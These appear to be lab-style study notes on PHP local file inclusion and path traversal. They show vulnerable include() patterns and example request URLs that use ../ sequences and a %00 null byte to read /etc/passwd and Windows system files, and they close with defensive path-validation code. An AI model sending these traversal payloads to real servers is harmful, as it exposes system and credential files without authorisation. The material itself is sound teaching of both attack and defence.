A File Inclusion vulnerability occurs when a user can retrieve files or execute commands of their own choosing because the input that selects the file is not sanitized properly. It is found mostly in PHP. An attacker could retrieve sensitive files or even achieve remote code execution.
The PHP function that causes this vulnerability is file_get_contents, when its input is not sanitized properly.
<http://webapp.thm/get.php?file=/var/www/app/CVs/userCV.pdf> - normal input
<http://webapp.thm/get.php?file=../../../../etc/passwd> - path traversal, also called a dot-dot-slash attack.
If the server is Windows-based, the file to retrieve is win.ini or boot.ini.
<http://webapp.thm/get.php?file=../../../../boot.ini>
<http://webapp.thm/get.php?file=../../../../windows/win.ini>
The same vulnerability arises when a developer uses these functions without security awareness:
include
require
include_once
require_once
<?PHP
include($_GET["lang"]);
?>
<http://webapp.thm/index.php?lang=EN.php> - To load the English page
<http://webapp.thm/index.php?lang=AR.php> - To load the Arabic page
This PHP code includes a file based on the language that is requested.
<http://webapp.thm/get.php?file=/etc/passwd>
This works because the include specifies no directory and there is no input validation.
<?PHP
include("languages/". $_GET['lang']);
?>
Now the developer has added the directory to fetch from; here we can use path traversal to read /etc/passwd.
<http://webapp.thm/index.php?lang=../../../../etc/passwd>
Sometimes the developer writes the include so that it appends .php to the input and retrieves the file accordingly.
<http://webapp.thm/index.php?lang=EN>
Here index.php has an include function that retrieves EN.php.
So just giving the file name will not retrieve the required file here; we have to cancel out the .php that is appended to our input, so we inject a null byte, %00, at the end.
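For the defensive side of the include("languages/" . ...) cases above, here is an added example (not part of the original notes) that canonicalises the requested path and confirms it is still inside the languages directory before including it. The function name resolve_lang, the temporary sandbox and secret.php are assumptions made for the demonstration.

```php
<?php
// Added example (not from the original notes): resolve ?lang= safely before include.

// Returns the absolute path of the language file, or null if the input is rejected.
function resolve_lang(string $baseDir, string $lang): ?string
{
    // Reject NUL bytes outright (the %00 trick); PHP 8 path functions throw on them.
    if (strpos($lang, "\0") !== false) {
        return null;
    }
    // Canonicalise both paths: realpath() resolves ../ and symlinks,
    // and returns false when the target does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $lang . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check: the resolved file must sit under the base directory.
    // The trailing separator stops "languages_old/" from matching "languages".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sandbox so the demo runs offline: <tmp>/languages/EN.php and,
// one level up, secret.php standing in for a file outside the intended directory.
$root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($root . '/languages', 0700, true);
file_put_contents($root . '/languages/EN.php', "<?php echo 'English page';");
file_put_contents($root . '/secret.php', "<?php echo 'outside';");

// Inputs mirror the requests discussed above, plus ../secret to exercise containment.
$inputs = ['EN', '../secret', '../../../../etc/passwd', "../../../../etc/passwd\0", '/etc/passwd'];
foreach ($inputs as $in) {
    $resolved = resolve_lang($root . '/languages', $in);
    printf("%-28s => %s\n", addcslashes($in, "\0"), $resolved ?? 'REJECTED');
}

// In the page's index.php the call site would be:
//   $file = resolve_lang(__DIR__ . '/languages', $_GET['lang'] ?? 'EN');
//   if ($file === null) { http_response_code(400); exit; }
//   include $file;
```

Only EN resolves to a path. ../secret names a real file, but it is rejected by the containment check because it resolves outside languages/.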